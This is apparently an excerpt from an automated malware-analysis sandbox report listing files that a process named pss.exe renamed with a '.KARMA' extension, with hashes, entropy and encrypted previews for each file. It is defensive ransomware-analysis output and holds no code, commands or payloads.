Encrypted:false
SSDEEP:3:LJUNRhErD7FGPV14zJ//70n:9UbI1WX4lX70n
MD5:35A02926A5A93E473BB5762D8838B85B
SHA1:22769C39120F52297D091EFB8F7D8BA01A570B00
SHA-256:121381FAA470B21EE85CE710B5B1BD421D7C61BEA0C7DD2DEB239E830893CCF1
SHA-512:04B3747887C3AD90C85479821D8D418291B46113A4E0DF833BA68CCF1675946E7D3F08FD0B854D6786ACE7035B4C9DEC3F3143C4DE2464DA25D6999595708ABF
Malicious:false
Preview: .sl<...M.K...>L0.`5..N.. ..&.....0..oq0...HV,2.".=...;......KARMA.}
C:\Documents and Settings\user\Application Data\Microsoft\SystemCertificates\My\AppContainerUserCertRead.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):69
Entropy (8bit):5.669906159582652
Encrypted:false
SSDEEP:3:9KUWaVIXOEl0od9OWj3mUF:9kaGzXOWjJF
MD5:047DB9AAF20A2D05E51B31680F9123A6
SHA1:AEAEB2A3CCFB1ED0FC3F7B3BDC59DDA0EED9CC8E
SHA-256:2DC2D8EE5D1D6CE9EFE069CCCAA8711CC8356DB14E14034CB18F9AD938B3C96C
SHA-512:21F0E286DEC012773A24D885CF952A8A31FC80A1D026B9C256DE95FD4B56C3479D8D7B035F3D329679F2F66B0A801DB5AF386E0C8BDE6A221B8BEA2781769BE2
Malicious:false
Preview: {A...e*.Z...=Js7..g.(H....>...h.sm*.Q....).+.......G....C...KARMA
C:\Documents and Settings\user\Application Data\Microsoft\Templates\Normal.dotm.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):18007
Entropy (8bit):7.990131636127572
Encrypted:true
SSDEEP:384:8FBhkci1VuREP3oVfdQnBQ6bNWUSBU61tyDvPQ8w3kjkya4z:chkci1IRg3oTH6JSW6iDQmLa4z
MD5:31E5361B11127C3DDDBEAFC7034F5E54
SHA1:745632C46BF910D50C7C858CA68E96B7A4F27FCC
SHA-256:349360670ECAA86C5D6EF6342FA580EEFA0A366FC4C3B879D30DFA6330BD86C2
SHA-512:B745C75E75BEFBDA02AF5617E3968D98024CA3BE73C2F1DA98E7007647FCFD3210CCAA8E815BDEEE84A640B040FA1F2C2767FB9ECCA9C7803DC485C4E940A1A2
Malicious:true
Preview: .cz.N.,.l...X.nb.0...T.s...d...|8.a.I......@....xA.x.Rb/....KARMA.Ie......h.D..4......{.....).._)[.u.{.dH...2..3zJa...#.....:....C..D[C*.c..\}.......7...E...-yB.....).D.>...v....z.n.z...z.........)..g...\s.-......V.*.L4.N)u-.Vla.V.<.j.X...Mpi..p.G.l.....2..M.q$..Z..... 5WK.s@..e.O..7[.c.(..#&...........^..u.,.*..k.#.9..a.6..=....h...1.zd:..G...).*.;.F..=d`E.B5Q.....IQD.....i.a..P.E.E.A.r......G.t..s`g+.#..S$....oT.../x......~G..$.t...T.9..K....#.;...~#..' \.6..T.%.r.?....?}>a......2....).}d...q.*u...PJ...cC....jE..\.].....T.......*&....l.Esf.T./..G.Lr..$..8.....A.x._..N.Q.Y}.X!.%.v.*7.YA'.m.w.dN...n.!...._C|a.+D...H>!..8H.K..N.Xv.ANx...../` 3..a.....&.f#.bv;;.%...B..u...rfXjN....lV.Jh.z..j...M.#.)Q...QJ.*.Z.F1.8[L..Q..g.PfE.&........I. ...r.,.wx.P.a....t.....#;....<...........lL..X...9v....V..x......8L...p..P.8...V.../.Q....W.iI_W..mC.#eS.3......F...{t.b.X..nMPx.T/..5ZC.hUu....G.....|.....U..8.w..dG..{j..r.+....L.-...=.c.|bS..b..b.W...
C:\Documents and Settings\user\Application Data\Microsoft\UProof\CUSTOM.DIC.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):89
Entropy (8bit):5.918321740242394
Encrypted:false
SSDEEP:3:+q1RGG6OOpsTWuP+0qgeFH+EjWCT1TZn:+WgtOO2TA02FTqOn
MD5:68132C15654BA5EF2B549D059197905A
SHA1:6068A786D8EE6092A3DC4753CC75B472395B8A0A
SHA-256:9A4CF16C5831D71583AB001304DCAE8D00B7C3D72DD53B55AFADBB5268864ACA
SHA-512:0404F84536F9E7C0138426FAEB9D797D1B1031F9CCAA1FA096CAC3E9A57B1C26941786CDE12370A774B757CE36D3DFE19D90E49DE3AB3FFA8BF8A27D2B4727F8
Malicious:false
Preview: ..XD.M.\..>P..}...#_.:#.K..'1......1...+....{.....i...SJ......KARMAm'6...F..,)..P...q.
C:\Documents and Settings\user\Cookies\DNTException\container.dat.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):69
Entropy (8bit):5.546859420514927
Encrypted:false
SSDEEP:3:F+jje9WJdw1lR1v8PGS2YRk/rJ:F+Y68/
MD5:5B499BED35FED7243509F451A75928E7
SHA1:5FABF5457BE665924EFD0345849A8E713EDC1F01
SHA-256:828D1258E9D7E635A146E99305A030D7080B24921437D874F962E9557B662FF8
SHA-512:294F2342BE760D021E47337C451BACE54888FCE29DC7A4F468A6AC589EF0889C0AB28D4D97E429A710988F23B37B3A7BDD7C936DA150F5C3F211A5B4A6B4C843
Malicious:false
Preview: ..c4..m..i..Yn.{...w3{.......=.j=-tR...e..n...1...|=. .....KARMA
C:\Documents and Settings\user\Cookies\ESE\container.dat.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):69
Entropy (8bit):5.600994746507819
Encrypted:false
SSDEEP:3:7CHl/Kx+VqtM0115:Qli7M0r5
MD5:E0A45DCCAA9B437A536F14824F97A152
SHA1:BA550F9FA20C67569823FAC2931422EA62AC5B17
SHA-256:6A559727651492A2565DC8B3886AD98277012C99550F1776D392A4C62C913B6D
SHA-512:03139DC5358EDFD0CD55959AD5F718FB7AC0F3AA145F73EC5DD046A6F4DBF5D52F7B96C13AC2E7428DBA6CE350AD744CA7FA9A8311821F5371DFA9BA020ABF8D
Malicious:false
Preview: 3.:.z....nO_.u...[.i.LARe.3....O.*...|.../..P..}<m..9.......KARMA
C:\Documents and Settings\user\Cookies\Low\ESE\container.dat.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):69
Entropy (8bit):5.737370247003717
Encrypted:false
SSDEEP:3:TNavKfB6lGAZkolOKupk35:TNavE2oKJ
MD5:02B7046153A5999A7407DA486AAFBF80
SHA1:D0F479A6D0D8CE262EB5C3DB9EF20470EDDA0E9B
SHA-256:C42CF58ACF126C010107B40A6EBD3504ACDA5B01FD89F159EC9C4D43C3DF0748
SHA-512:78C6D29BB76FEAAF95DD682C13235BC13F994418347B9DDB86601A8BB46FD14F0B7591FD97006CC967F1D332FB08F312EA603394EFD376C1D7B3EEA8F227AABC
Malicious:false
Preview: .I.s..cS.^..T..(..mM.d....vG..."..jb..NB4...u...F.o....dE...KARMA
C:\Documents and Settings\user\Cookies\container.dat.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):69
Entropy (8bit):5.640920652336276
Encrypted:false
SSDEEP:3:9JT4o8cD7aYB9dT9:rT18JYz19
MD5:E51761D4EAEB7C232441C672460CC10F
SHA1:8C33F89BE3A2490024AA3199415C92638B0B1D1A
SHA-256:1AFDAE05A0921A5E4F6F314600C0586E028DBD748A49067572090AE744198472
SHA-512:1CA48BB3C72C801E95FC8723768C68C620654D68597748EB31860DBB7BA7EDD33850B6217FBB056300A8DF45E7F6A89254EF6681B1636F50BDE1ECD58EF1A067
Malicious:false
Preview: .L..,..H....X]t;...g..[=..\...\.Eac.T.u...W..W.E..g..:m.OG...KARMA
C:\Documents and Settings\user\Cookies\deprecated.cookie.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):160
Entropy (8bit):6.663016082604735
Encrypted:false
SSDEEP:3:pqGGJSezV7JTlQGv2B7XSS+z8EQWy1NykjlG8GFPdpUcZ8MFBoflDKp0n:kGGJSezVPQeXS+4EQWClU5FNFiNC0
MD5:C5FFF037728FEAA3C3B1828E31E766BC
SHA1:CFCB22ADA29D280B28B5DC3C7127F3D96D34DEAC
SHA-256:B8F60BD82CCE7E6E946B4B4A389ED3E584102B481C14D689923FA6988CC21C99
SHA-512:865004CB32567870F62ED3BEB5CF38740A3D1779DE8C0CEF1FFAB75ADB9B73632A30BBD73A6236C26C20BB21F2EB770692F10E634C3282C5D8BA3FA8B8335FDE
Malicious:false
Preview: ..+...a#.?Il/.Piz....W...v..8...Ep..D.N.~...E. z......T.........KARMAq..V.fL0h.$.........h..m..p../,..#`............M{%..L....&..:...c......TA....&.U...-...
C:\Documents and Settings\user\Desktop\BJZFPPWAPT.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.828524406961908
Encrypted:false
SSDEEP:24:daSZxA3anfv40RULHTpiwec06UmGdKaayO5/106xsqmqrG2OQ:daSZNfvEHTARc06iKaayuG6ujt2OQ
MD5:DF49D05C4F5896C23935E857901144C6
SHA1:873592CC55E5D3BF80D1F6A88118BDEF2FC2A1D5
SHA-256:DC071EB24D1EA3DCB891DE552AF16EB9171CC47619F61A0FD85D489504B25060
SHA-512:8B7B49A74568E9AB1D5C83E1B4774879F22EA31A4DDFC20F7D7B4C358094AA7DBCA2FB0EE8A9CA430FA41A2A85490ED33B302413885EE2E985D1F519E7306FE2
Malicious:false
Preview: ....}..GLn.>..."{U.......l."...]?....G_j.)h....4....Eu........KARMA.......uW...G...o.]..j..Q.p-1........*.Y.'G.D+,a.]...2.B...c..nD...&\.}z...p.}....U.z.:.*.)%...@..v"2#l.0..}..Sc.i...i.0. ...4.~ ...'[wQ....g..z/...]..c..h`A(e...Gb..B..#F..Z...4..MD..Pn.....,.........{.... ..R6+.f!...?.vG.[;.P..Q..{..F.....h.B.U........S......C.,..].........v....?M..Q...O.\.b"m.9.Zuo....2%3!..d..k.....g\.2A..+Y.l....~...E.<.Dj...._.=..O..m0D..X.....L...|y+....]...........sph...".rB....R.1,..H.5'.....|D...N...{n...Q....z..+) ...WC..m.:3......S.u<k..._..w.5"$p..:.c..D..!.... .>.?....i.......!....5..4..W....8,.U,G..*.k*.......N..?.q.."...0..I....!S......./o./.`.JU.g-.\L.......W...^R[...^....g.8O..._....5W...(m......<.GK.E7nt$....~.L.E.89I..Le.....C..\.-.|.$..W....Qfb@..8.s..G....7.Z.<.....`..2-.#.V.rM@.h>E.....pf|...{.r..\..<.yP...7.l.......[.k...+.&....."...1e...r...t~.m.......^.*`d~..X[.82....O...\'..Zy..k.K......T..7...F[Q....".S<..97z.........&?.....E..U.F.,...iN...
C:\Documents and Settings\user\Desktop\BJZFPPWAPT.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.777045896477449
Encrypted:false
SSDEEP:24:2A7Y3u0jKZaXqdbQt4OTxJ+N4ThndhUu207KxZwjob3:tYvjKZa6BKj+NYrUJ07KF3
MD5:9D14749E0744BDD2900649AFEB8515C7
SHA1:3A31461658BF8D101129DB9E3E52CD171473E0BC
SHA-256:210452686AF3D20653C10952E2D8A49CED49137D754B5D9DF0D777DD92574C8F
SHA-512:316E6DF01F6DC9BD10B4C3ACAA9F80554A325007B893292A0D89F4181E1213BE9589CDD99E03DDC8DA74C41D39939BE164AE0DE4B540A17EDFCEDE901E921D78
Malicious:false
Preview: .(8...?$.*<....[...E....}F.$....bYS.......M.mYG.'?}.,..c.U.a...KARMAc B-u3.x......a..........n..Z/....D.-.}jq..1{'...u..U.`m]1.T......"...ow....<..>.)n.8..D.T.r....._.O...f.9.A-rPi...fI:.........7.Sa..M..DN...G].j......$.q..7o.i.b~.M.lD1v8.4V..Q!...<..13.ra.D..#.O!.\ .QTr+i...!.4A.(|....Q.8#r.B,......1......C.....GG...r......1......~.jG2..L.....f.8...F2....d.H......V.E+...&.`..G...tS.~>>.]..1(mhF.G.HG..w...v...-o...K...v.,..Bm$.g..3.8..9..UC.B.I.X7*p.<.....j9......b..f..|cv<.4x^..?.....r....u...:.......ue..cq..t1.T|.....n...O.o>VR...B...kYz..L@..T.._2..8,........(D..EY..6.t..$!1{..!.]~&Iv...8....[.Wkhr>TE..+........FE..?..'..l......8~....Y..@...2.S...|Y.).'K.-...0.*...D.....`oQ.W.:.l..'..a..|O..]1.E.@<#X[...E.{..9.....=....1...W.5.V..I....2..M.=IpE....aF.H..;..w.....C.&...,.z..}!..y.......h.:Em.....gka.:A....2E........SI.....frw.X.....1O]..W..&.]{w...K..8'*+...~.k...:''.bk....n,..X.1w..."....1,......f+.....X...cI..d.U.~ }.a.z.....evS.2bn..
C:\Documents and Settings\user\Desktop\BNAGMGSPLO.xlsx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.792133753040234
Encrypted:false
SSDEEP:24:TUwxDgWdiPHdjNOyaQlXq7YOBsU8wOiHoMxlsqCMBzrWKIT:Awqy8OYXk8RFMxR5WKIT
MD5:B97349C71E967336930D9C60296EAE81
SHA1:8B6D5D425295C3172AAACE42FD162EBE3E3BB199
SHA-256:E64BE070F3EBF1262347D720B385F29F59332D6436DF022861CADA90D8A70C88
SHA-512:A99918694F6F6D8994C0922317C111383ACF49E3492D478DC65FDCDB6AAE61416806B4718AAC830C745359C37A62067E924706A150A9CFD24115B351E9FCB02C
Malicious:false
Preview: .A."Nmu.k..}-..Y*...n.s.u9......*...0...M06XY<T.T.~N..1.....KARMA..h....,....n....IeV..c..3Q.A..H...$.Mo....>.X.o..M-.3Q........x.`...|...7......V#.j.~....ak.{.R...Z....9}...y......R.Wt.Y49...........&1}.....u...4=...5....&.A.{.....#.ek(.\..^._.....!.c...&&..m..mc.Z...e(.....6..].6.."...G}.l...>~V..kD.z.7?.[.n...;..6..i...*..0.....u.....nQSZ.L|.@.iZ.vhO.....P..:[=ip.E../Td...n....N.{.*.<icBy..;J.*.6..K...- .......z.A.l..'...7.4)....h...(.].*....k.$..P....q.7.Xw.Z....IWv..v......U.".`.;...L......a.....Y9.fd(..p*o..Xb[.-..J.. ..*r...2...&S..Q..w|up...F.J.QD..v.M{.5+....X.#r..L.{..Pb|.[......s..;.P..h..Bl..V......Pv.t..Ot....0.>..F38......e~1........1....d.....~.k...K....!#...%..Pb.....)Y..V..N..r.g{)..^.Y..1.VB.9........4k4..........;..I.>.....+.a...w*...>.).O.k.....<n..m..H.|.H]...7.d~v.g0..mY...[T..&....r4..*.......}..Pp.....b\.....2.@."... .Z-..Z.#0.l.yG..?...,H......Ke........l.@.=jF......)j.L..R....G4.vj+..[F.W.l.s(..-...
C:\Documents and Settings\user\Desktop\EFOYFBOLXA.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.808408298574005
Encrypted:false
SSDEEP:24:i9gyeCSCVNPvQPzCXrzQykbDOEuxWw8aJwfi0zg:i9rfPILCYyADO4w8aCi08
MD5:7C3F64A08192EAAC0FE31FAD5F5FE17D
SHA1:294CB6345580378CAD00AD0FF735C71348D6C5E9
SHA-256:5408885F34B002A2BF7F62D1B640DEE2E5A83FEE27F1D608B2C27CB468E5F0ED
SHA-512:CDBBED517E7C0C3BD14D966C15E76482326371F0214D119B1041422973F250CE34AABCA26656EF00095A7BB186E8DDE628AB72C64452C5E7AABD311FDCAC6985
Malicious:false
Preview: .{e.H....f....QY.,.HIt.b..........U....!.......W].b..T.7y.....KARMA...{..+..R.Ex.g..j..]....qrF'.g.%.....8.h..6..<...G..,...N.0g.....}...w95.....Z#2...1.T.j3].VZ.z'[.KW...MO,BN...*[f.4. ...W..+.P.......wg.x.6:...b.}V....^.A4c....@d%.......9...pv..u.......@....D..ag^:.~.........$a.w.......[...8P..%..R{...!S/....>.E.#...tw.P.jnu.....g#zB..Fu...q. {...A.eM....9>(.e..s......*........"\.P...=...Osd.0.V..Zh..[_@P.U.?.W'.y[...E.@..y..Z.=K..Z9.......t.^....X..C.S..(..O...:..B.o.,.....EW...-.f+....=...X.*..... )z.\..!..x......E....v....nM..Mwu..PI..Gu.ou......x...R..2Z.).y...8.3..~.<.xS..I.9.I.i...%.a..x..../.....w..46.2Hw.`..x..r.m!V..CVm...su.b~.....egN.+.}.WO...m.......9...G....6ZPa.2V....p.o.E...XB.+....N.*J,.!.e^....&....!..x39.....{.....5.Q8`...j...T...2.......Y.%..u.Tt............Y;.o.........F...3@.f...a....s......z.k...=.9K.8...J.d.II.K.........8...8]...A".f.b.... X*.?..Gqc..Hm.*..F;tSI....FWZ.Y..,/.0h.........Oq...7.
C:\Documents and Settings\user\Desktop\EOWRVPQCCS.png.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.825390699299319
Encrypted:false
SSDEEP:24:fYj+1UAwKmdyUAS8I6E0V45yMuDdIi4BqaJr+WJAxIgOqp:fYjSU20yUAZp/yiS+NxImp
MD5:70B8753BB43F5B239F176592C6175819
SHA1:77D81D9BB7AFF498564555BD638A331B33F9FCC6
SHA-256:5CF6FEED893D7C145014012899C0A8CE929A392729B775E655C4E1B73DD0FBBD
SHA-512:7AADA4CEBE30E13E5E5A592FB604D85AFF978787D1E2D04FFDD05DAA114F51D7409A16CBD9BE502A7C62C493D2476D4E43B9EE574AD4726B5961E685EF8DA00D
Malicious:false
Preview: {\.H..V.f..0.....Z.:%....W.u......8...V+....W36}..y.5(.nn..[....KARMA..9..#X..<}.....$&.....t....I.eQ8.<.xI.h!]..........~..!..q....|7..y.{u.#u,.C...hn..M..T0.....0v9).R.....C..Z.....]...-........{~..[...Z..$..rC4`.....)..B.kC....".K{.n......I..\,...^........Q......w/s.Q6....AQ~.q..wg..3.e.t0..b..2S*.^...".Q..d..\.5.....=.LB.._...f7.$.gZ.[...*X..../b.<..^.f.H./.nW.Ov..3....I..<.d.xG.e.Z....$A9....f.._Xy;..Mzlu..........)..YK,.....H_..n.i%F.].!.......zunEu.i...%..=q."....}$.<.V]..<...!..s4}..<..@_(..i8....... .s.8jF1Y.c.~O.VQ.eK.G?....p.K...X.{...|8.5].X.d..b.5U.q>...t..^.Z....m.c..^w.*..Wb.c{q..>s..}.4....`2...[.,M_.T.,...m*.9.{@.VT[..L.@..?......? _vFM.E&.}.w...(7a+_.A..yN2..{e...?......F}\...{L..O~.R......?qu..o..Zj_.<8..n4.) ..]9.;..r...K.m&N.rvuge7,~.......\....g.h...[...!x.s.F....<.SBr...'3..cA.C.?L....a6mw..C...E6k$...6.w.:.......2i..w.....`P2E..,IY.{d5|w|_...S.../...G..>e..C....]w..l.2[b......N.'..2.).o).K&..i?.(...
C:\Documents and Settings\user\Desktop\EWZCVGNOWT.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.822077045349632
Encrypted:false
SSDEEP:24:r0WgD2WEXt0jLh/oZ+f6/d5E7+zpMmbv7kj/P3xOWp58t0Y:YWgTbjLe/rEyrDkpi0Y
MD5:18762232B1E12D3B57BF1672262F1C30
SHA1:AF05AF0017AE501FD7161016A193FA6A38994A1A
SHA-256:FD65251A41BA0D978B57AAEAB4BEBB9626950E4B21432190DEF47A13E17BC625
SHA-512:84A4C2047BA0A23BE3B65988AD8C9AD8E8B13CD5DC6E59070A4DB25A7ABC5A660E23B1765840D174EE8258CD8FDA605001E4483640FA6BFFC517DB382E2A8C39
Malicious:false
Preview: ..@.Wa.:3..]U.1.!...~.H.DR....yS.2tn9r............@...W...KARMA.J.^..h.P.w..\h...@...x.b.0...GB.n..%=.rY.?.3~.........>.{`1h..e.I%.q.g.:iD.e.p8m..T.^>.G.z..j.Z0.h4T....D'....{.<./..<.2.n.,.B.z..`....W...Y}L5..$..."..j_A.......LR@?Zg.e..N..A...l.1..`.....oA.e.r...5Mv...p'..._.N..$...=.Gy..|...j.8a2S....B...D-..H.....n.U.<...vq..A..A........l...@r..'...O>.v.J.,jQ..m...w.....8.....j..$.y[{.......h...F.}.+....L.>.eJ.}.k.O..f.[ly...#.8y.$s..1.6..W........o....W....e..D...L.T].j.......=.5.Y.,%&z.-...o..ze'..O.J.sr._...%p....G.....gP.jk.H.6z..f$.,...y.q..HY.=.....U..?-.wN|....Y.....\F...@).1pAf....rTF....FC.nL..N.?....-d......hO.mf....3+.....i.n.E.<TW(k.....'\.'..R.[K..(.0......|q2.a.n...[.V.....&.....e.&.O.y*".....E. .U":.8.L..l..... _e+.@S:.V36.....p..w&..5.....wA...TWhN..S2.M.G.UM..D...r=.]?ce.|.2.Q.F..?*p..V3'8..`=DD).0.:w..{.K.GO.1.@B|B..D...S}.^.%7|.......2.e.P.........m....X.....m...M...r...iO.....~./.....x..v..-.../.....=.J..,..~4UWjg..>...3
C:\Documents and Settings\user\Desktop\GAOBCVIQIJ.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.8026531878921945
Encrypted:false
SSDEEP:24:5g1h7d4FX6FJIcQaPDOZL6FpnuBKHyL6SXkMx6EWmpf6VS4:5gr7dcKFWcFKZLEnuBK1SXkMdWHU4
MD5:57E5A8A0B4D0F8ECB16D63E4F403411C
SHA1:C94126ACA4FB4642750D00B1977EF8448489BA77
SHA-256:418B82E5B2D93FF9A08989319EAA262EF6E63A540C2384F63953FAB6F208C36D
SHA-512:9DF0669F44697CA0BDF3D1E98FB159B72005957BDD3CBA26EB47E79FDE19557E8566F1E0AE66F4BFA62963F55BAAE4109D20C227E9D27010C2456B10A093B945
Malicious:false
Preview: .3..pC.W.%*4Y$..M.&...P.h".P].... .=...".%)}.c.R.z..[Lm...Lh....KARMA..../.<.LO..lw..../.....!.{S...^$....LT].yd..."..Y.;sy_{.N.9....^Q|.k.w.T..$..hO.p1Q..}.....6.r.H.........d.G......DB.HB.V./...`/..*HO..<..4..r...WaX;......H.....3/.,..5.8..b...I..y.4j>..<.u...3Z....K|qO..k.\..t...<... .8.}e.?..!..;~..\.c...k......+.b2.u..4E..b#..h.v"...........;.2.^j...ct?.pr.G.c.....-u,..-Z.rX...//....M.*....L..J<..../.G..\.e.9d.....C(xn.6d..C....5l...{H[.}tIV.....} ...9%".,...4\;...1....._^.*MA. .w.T._.P.^...w:.p.`.......w.jL"...4..nk.....a.[Y...pU[......r.N.dj....cu.?.1`.Q(o.b..9'.S5k.6..M...$.]P..[bz..4..*..u..9.$.....5.9{0$..1...../.yX..Uiu..........1-...f.3w..T...c.I....H...e..X..(..^.<.v9...3.r.C..;=D...FfY.$..T/....C>....{>c..X...:x.|...g.me.C.U...L....."Z....>&.....R...$H..U.4p.U....nR.y ;........R..f..6.r.Y..G.....L.u..7^.Y<.R.<H..;.5.....#.....bUg...8..{..x.DFP...z.j.A;......."....g_...:.....=u`.".~.T^..*.*8..q4.....E.\.&.v......Lw...f...>....
C:\Documents and Settings\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.829657089271315
Encrypted:false
SSDEEP:24:zNfCf5dN0hd+kQKdfu0TRYLdNH0wMjzg+c/:zBCfy3+bKdTaBNCjw
MD5:7574183793DD80CB429EA748740B526D
SHA1:6B9298AAA1EDA4AC76032FC24CAA7694B42CA8BD
SHA-256:4E78D6142409C842F363E1AA7838194E7EB3CDC5DF8BF2A27E5ACA4DE48A344A
SHA-512:0549B26883D00AE96296CFAF3C48BFB4F3BC6D97E224840847FDE7EE90C155422B712110501E53912E261B9DE8C12298650E8DF2AA98756A836DD21266750DE2
Malicious:false
Preview: .D.k.l(M.&K~.f.H.!+.w..$._.....n.z.h9.E.!0F...o.G.v.M........KARMA.....~..7.D.@..' .$h....V..G..@.$%.j....8.^.c..H...yQ...|+.V.O.Hx...V....m..`.Au)l...D.....%u.._..R.<.J...m.>J..7x....^....a....U..B."..h..^%..[3.3...{.`t....u...P.......V...4T.....;t....hN..m.....9.e3h.......l.....`......!.|..}.H..._*3.V.... ....Lg.(tN..'..{...^..{,;8.u.31e.v.a[w......uU)..J.HF...;i.o.ge.......Ao.....(..e...=.iRCU..q..5.Vl..A.We....:z'\.ua.&N.n.thm.cvN..F...[...Xm.8........1Z.s.V..u\g..E..-7....{...B..M..*.=..t.......)l.b..,a.-.N.zg..w.R.,...9.......<.I.W...m....!._{]....m.f..FJ2...?.-.o0.<R.*.N..%'..F:.ym.j;Dj[.r....J.....7.....g.^F.....!....s1.).........D.L..[v,\..'R.).L..T.kI.Uk.<..^..p23p..bi...E..)C..J...gB.s.|k..)~.j./..^......;U."d.k.d.i.Y.=..1..:.....]...@.]........O.>!..J.X....# ..o.!....qiEjJ.....,l..:....(SWz.F_Oe..a-...yq._..->?}....C...K.....~...$.[&.N..H.G4.....Xw..6F.1..|.(v4{.{.8n.1;.?.~-.z3..NnX.^.1.t...X.!5.....gp<.p...0'...q.0y..~.9....fP..
C:\Documents and Settings\user\Desktop\GAOBCVIQIJ\PIVFAGEAAV.mp3.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.82408303678608
Encrypted:false
SSDEEP:24:kgsFb9ZQBbePoZN/rTEu8xao0imBPDwMY9yqVWkxrAbYaH70TgIlXn4:kzJY+oZtbGj0/VkMY9H0kCEo0MB
MD5:C693F4348FB549A0E912F3519A2563CF
SHA1:6316781F0508ABF2E5EAC2AE0819E08938872154
SHA-256:F8566E49754FE3FCCC276504A9F0B4DD1F0C23C3D1826746D529CAE77B60DED4
SHA-512:8A3FA878108C9E3F55B44CC6CD41F20A6A05EF290ABAFEBA2072C4DA7EFFF2B9CDC7821EFEBB7FD3B6E65AF7C05517177A39EC8477AEC4659F31798D163673A6
Malicious:false
Preview: BI....RtbK...'....d..d...........Fg$~.QXl.Psi|........J2......KARMA......:xx.ok(....P....5.m.FE;^].bX...w.Q..$u.8....._....C....S.w...x=/ "^f...I.....`..n9.c.q...v...:..O..V............J...h..|`..7[..+..?C3...H(|ua...\..m...^'n...J. ~....e...N.w)8..tCL+.........==.4.......aif'O.T@..>.I.@...>k?W$....v....]...JG.. m.3.FA.LV.....QN..kH*..O{ZS~.r......H<........'.E.mt..'.rVy(~..h(...Z.I..n.j...7....S].q~.H...{.............O..Z..=...+..8..DG.>.vCe.4.....+.....6?0...U.+..IlQ7Q.l.p}....}gNg..V.wHY....1ic.+.$..0..G2NW0..i.A....s...9-.0}.... ....Cp....*...@U.....x9.M+.J.*X.YB..P=M.ft8u.WM...X .......v...a#n.boS.2...T.%'z....$Z.....P/....[..+.C.K.c.....dxYv..._...M..Y.p8f.&/14 .......5..=8.5M.K.7...o......z.... .Y]`.t...t...V...A.....NRZ./.M.........y.k.H@_.d.,.s..@..Ay$\............f.&..N....%OFh,.!.Ae..*.....k{...<.T.)H.(....!g..8R.#."..Lf.C@%'.N..ev..%;:..&S.Q.%...X..W...O....6!....(.@S.L..;E...B..[u.QM^.!.C*...Qq.... @N.z..(.......7v.3..P....z
C:\Documents and Settings\user\Desktop\GAOBCVIQIJ\PWCCAWLGRE.jpg.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.848759370626013
Encrypted:false
SSDEEP:24:6ULzwc8GzlL3ZsPd1CGuwfZZJnHb0h25hPp5poVuqs6HfjnchtL9:6UHLppLSPd1iwfNAh23PpsVlsWEt5
MD5:2262A9AE75A2911F4C1DAA5AA1D07097
SHA1:28B74610BCD74B12E520BE708B0910C367274591
SHA-256:33AC5AE54DD113B3B4DD3845A80E9E69A91D5F13BE6B0D91C2204A5F39925155
SHA-512:369CD40E2BB761B3F68FF00E20AC3880C576802A8B1B0610AAF5A4BAAA98FD88AFC8689CB19D1F74B06C4C686E48B6591F2C8E5D6FE03567E24D0BDF56F6938A
Malicious:false
Preview: ..,....S+....p..........G.....f..} Q..9..]..#a......Y7......KARMA.w..[. <. ..f.....`..>fWB.6...8?......x.{j.%..G......AP3.X...K.....X}...l.+...1.......c.......g.Pc...R...Q.l..3/...E)...%(S_..c..U.n...B.f.N....r.^-,.e.>=<...1}. 6~5.sR(..s.....><L..ok@.~....R;..%..i.!].....*..;...'.Px.X..R..>......F:-A.5..T.....#3O.........o!nht.K..m'.p/.r....e....., ....7.....F...W..59........... nE6.....'...'..LaP..`.....".^w..o..U..c..=.z.Q.*......2{..$.".WX...%.G!Y.M...7._..O......Re....|.N..X.. K`$.e.....G...9C..4.R.Cz/..`..W;.f.7f...l. e..&T./..%...d.2M..`..b#-...J.wy~*..$....J. .^.>3/.q8...b.....(...Z2B].W..u.HZ..$f....OoA...eq...w..b..%u+4.#....c9up...cyv..`}.).evZ..Y..z..........AN..d.....T...$.h..g.g...va.u/a.......E.9...MeD`.O...h..L..N...~.....-&`o..m%.T.n.~.......}NOu..'-WV ..[c"wN...4'.........M.+....oWZ=.:H.Gl.1.s...4?.%.9..4s..U.2.Z....+...H ......".../.B..,.z.z.D.v.....y.r.....G.ET....lM../.-9.vZn.I3.%S.!.[....u=.q....S.... .?*...F.Y,..K....
C:\Documents and Settings\user\Desktop\GAOBCVIQIJ\QCFWYSKMHA.pdf.KARMA (copy)
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.781654596856385
Encrypted:false
